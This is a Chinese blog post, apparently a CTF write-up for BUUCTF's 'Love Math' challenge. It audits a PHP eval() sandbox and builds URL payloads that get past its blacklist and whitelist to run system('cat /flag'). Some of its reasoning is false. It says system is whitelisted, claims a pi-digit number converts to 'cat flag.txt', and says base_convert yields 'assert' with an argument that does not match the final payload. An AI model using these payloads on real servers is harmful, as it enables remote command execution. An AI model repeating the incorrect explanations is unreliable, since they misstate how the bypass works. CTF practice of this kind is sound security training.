当前位置: 首页 > news >正文

2.buuctf [CISCN 2019 初赛]Love Math

进入题目页面如下

进行代码审计

<?php
//关闭所有错误报告,防止错误信息泄露给用户
error_reporting(0);
//检查是否通过 GET 请求传入了参数 'c'
if(!isset($_GET['c'])){
    // 如果没有传入 'c' 参数,显示当前 PHP 文件的源代码
    show_source(__FILE__);
}else{
    //如果传入了 'c' 参数,将其值赋给变量 $content
    $content = $_GET['c'];
    //检查 $content 的长度是否大于等于 80
    if (strlen($content) >= 80) {
        // 如果长度超过限制,终止脚本并输出错误信息
        die("太长了不会算");
    }
    //定义一个黑名单数组,包含一些不允许输入的字符
    $blacklist = [' ', '\t', '\r', '\n', '\'', '"', '`', '\[', '\]'];
    //遍历黑名单数组
    foreach ($blacklist as $blackitem) {
        //使用正则表达式检查 $content 中是否包含黑名单中的字符
        if (preg_match('/' . $blackitem . '/m', $content)) {
            // 如果包含,终止脚本并输出错误信息
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //定义一个白名单数组,包含一些允许使用的数学函数
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    //使用正则表达式匹配 $content 中的所有函数名,并将结果存储在 $used_funcs 数组中
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    //遍历匹配到的函数名数组
    foreach ($used_funcs[0] as $func) {
        //检查函数名是否不在白名单中
        if (!in_array($func, $whitelist)) {
            // 如果不在白名单中,终止脚本并输出错误信息
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //使用 eval 函数执行 $content 中的代码,并将结果输出
    eval('echo '.$content.';');
}

任意代码执行漏洞

代码使用 eval 函数执行用户通过 GET 请求传入的 c 参数的值。虽然代码对输入的长度、字符和函数进行了限制,但仍然可以利用白名单中的函数构造恶意代码来执行任意命令。

过滤机制

通过 strlen($content) >= 80 限制输入的长度,防止过长的输入

使用黑名单过滤了一些特殊字符,如空格、引号等

使用白名单过滤了允许使用的函数,只允许使用预定义的数学函数


利用白名单中的 system 函数

利用 base_convert 函数进行字符编码转换,构造出执行系统命令的代码

构造如下的 GET 请求

?c=system(base_convert(31415926535897932384626433832795,10,36))

其中 base_convert(31415926535897932384626433832795,10,36) 会将十进制数转换为三十六进制数,这个三十六进制数对应的字符串可以是 cat flag.txt

尝试错误再试试别的函数

构造命令

?c=($_GET[a])($_GET[b])&a=system&b=cat /flag

但是a,b都不是白名单里面的内容,需要替换

?c=($_GET[asin])($_GET[abs])&asin=system&abs=cat /flag

[]居然也被黑名单过滤了qyq


借助 base_convert 函数实现字符编码转换,同时通过变量覆盖的手段调用系统命令

绕过代码里对输入的长度、字符以及函数的限制,进而利用 eval 函数达成任意代码执行,最终获取 flag 文件

base_convert 函数的作用是把一个数字从一种进制转换为另一种进制。这里将十进制数 37907361743 转换为三十六进制。经过转换后得到的结果是 assert (37907361743 转换为三十六进制是 assert)

把 assert 作为函数名,将 5f466214 作为参数传入,也就是执行 assert('5f466214');

payload

/?c=$asin=base_convert(37907361743,10,36)(dechex(1598506324));($$asin){pi}(($$asin){abs})&asin=system&abs=cat /flag


最后得到flag

相关文章:

  • Httprint 指纹识别技术:网络安全的关键洞察
  • 【三十三周】文献阅读:OpenPose: 使用部分亲和场的实时多人2D姿态估计
  • 【Spring Boot】网页五子棋项目中遇到的困难及解决方法
  • Express 中 res 响应方法详解
  • Docker 部署 MySQL 8 详细图文教程
  • JavaScript前端开发:构建交互式网页的魔法
  • 使用Actuator启动失败,Failed to start bean ‘documentationPluginsBootstrapper‘
  • 基于Django以及vue的电子商城系统设计与实现
  • 哈希-字母异位词分组
  • (20)从strlen到strtok:解码C语言字符函数的“生存指南1”
  • 信息服务商演化博弈模型研究
  • 最新智能优化算法:牛优化( Ox Optimizer,OX)算法求解经典23个函数测试集,MATLAB代码
  • Shell脚本和Python的工作路径
  • 滚动弹幕案例
  • 面基Spring Boot项目中实用注解一
  • 电子电气架构 --- 电子电器新技术及发展趋势
  • [JVM篇]垃圾回收器
  • Windows第九章 控件的介绍
  • 共指消解问题的早期研究成果主要来自自然语 言处理领域
  • AdaMix
  • 荣盛发展:新增未支付债务11.05亿元
  • 价格周报|本周猪价继续下探,机构预计今年猪价中枢有支撑
  • 舞者王佳俊谈“与AI共舞”:像多了一个舞伴,要考虑它的“感受”
  • 上海比常年平均时间提前12天入夏,明天最高气温可达33℃
  • 张家界一铁路致17人身亡,又有15岁女孩殒命,已开始加装护栏
  • 习近平在第三十五个全国助残日到来之际作出重要指示